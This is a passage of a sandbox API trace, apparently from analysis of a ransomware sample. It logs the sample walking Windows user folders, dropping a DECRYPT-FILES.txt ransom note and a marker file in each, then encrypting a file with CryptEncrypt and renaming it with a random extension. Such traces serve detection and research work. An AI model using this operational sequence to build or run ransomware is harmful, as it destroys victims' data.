lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0088.351] CloseHandle (hObject=0x410) returned 1 [0088.351] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0088.351] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0088.351] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0088.351] lstrcatW (in: lpString1="My Pictures", lpString2="\\" | out: lpString1="My Pictures\\") returned="My Pictures\\" [0088.351] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0088.351] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\jkbimi8.tmp") returned 51 [0088.351] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\documents\\my pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.352] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0088.352] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.352] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 57 [0088.352] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.352] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.353] CloseHandle (hObject=0x414) returned 1 [0088.353] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0088.353] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*" [0088.353] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0088.353] CloseHandle (hObject=0x410) returned 1 [0088.353] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0088.354] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0088.354] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0088.354] lstrcatW (in: lpString1="My Videos", lpString2="\\" | out: lpString1="My Videos\\") returned="My Videos\\" [0088.354] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0088.354] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\jkbimi8.tmp") returned 49 [0088.354] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\documents\\my videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.354] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0088.354] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.354] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 55 [0088.354] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.355] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.356] CloseHandle (hObject=0x414) returned 1 [0088.356] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0088.356] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*") returned="C:\\Users\\Default\\Documents\\My Videos\\*" [0088.356] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0088.356] CloseHandle (hObject=0x410) returned 1 [0088.356] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos\\", cAlternateFileName="MYVIDE~1")) returned 0 [0088.356] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0088.356] CloseHandle (hObject=0x430) returned 1 [0088.356] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0088.356] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0088.356] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0088.356] lstrcatW (in: lpString1="Downloads", lpString2="\\" | out: lpString1="Downloads\\") returned="Downloads\\" [0088.356] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0088.356] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Downloads\\\\jkbimi8.tmp") returned 39 [0088.356] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\downloads\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.357] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0088.357] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.357] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Downloads\\\\DECRYPT-FILES.txt") returned 45 [0088.357] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.357] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.358] CloseHandle (hObject=0x434) returned 1 [0088.358] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0088.358] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0088.358] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0088.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.359] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.359] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0088.359] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Downloads\\jkbimi8.tmp") returned="C:\\Users\\Default\\Downloads\\jkbimi8.tmp" [0088.359] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.359] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\jkbimi8.tmp" (normalized: "c:\\users\\default\\downloads\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.359] CloseHandle (hObject=0x0) returned 0 [0088.359] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.359] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dd3660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.359] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0088.360] CloseHandle (hObject=0x430) returned 1 [0088.360] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0088.360] lstrcatW (in: lpString1="Favorites", lpString2="\\" | out: lpString1="Favorites\\") returned="Favorites\\" [0088.360] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0088.360] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\\\jkbimi8.tmp") returned 39 [0088.360] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.362] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0088.362] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.362] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\\\DECRYPT-FILES.txt") returned 45 [0088.362] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.362] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.363] CloseHandle (hObject=0x434) returned 1 [0088.363] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0088.363] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0088.363] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0088.363] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0088.363] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Favorites\\jkbimi8.tmp") returned="C:\\Users\\Default\\Favorites\\jkbimi8.tmp" [0088.363] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.364] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.364] CloseHandle (hObject=0x0) returned 0 [0088.364] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.364] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0088.364] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0088.364] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0088.364] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\\\jkbimi8.tmp") returned 45 [0088.364] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\links\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.365] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0088.365] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.365] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\\\DECRYPT-FILES.txt") returned 51 [0088.365] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.365] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.366] CloseHandle (hObject=0x414) returned 1 [0088.366] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\") returned 33 [0088.366] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*") returned="C:\\Users\\Default\\Favorites\\Links\\*" [0088.366] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0dd3660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0088.366] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0088.366] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\jkbimi8.tmp") returned="C:\\Users\\Default\\Favorites\\Links\\jkbimi8.tmp" [0088.366] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.367] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\links\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.367] CloseHandle (hObject=0x0) returned 0 [0088.367] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.367] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0088.367] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0088.367] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="Web Slice Gallery.url" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" [0088.367] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.367] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0088.368] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=226) returned 1 [0088.368] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0088.368] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.368] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.368] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.368] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.370] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.370] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.373] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.374] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.374] CloseHandle (hObject=0x42c) returned 1 [0088.374] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.374] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.375] CloseHandle (hObject=0x0) returned 0 [0088.375] CloseHandle (hObject=0x428) returned 1 [0088.375] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.375] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.375] GetTickCount () returned 0x114e88b [0088.375] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.376] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.376] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.376] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.376] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.377] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 54 [0088.377] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.v4Y3P") returned 60 [0088.377] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: 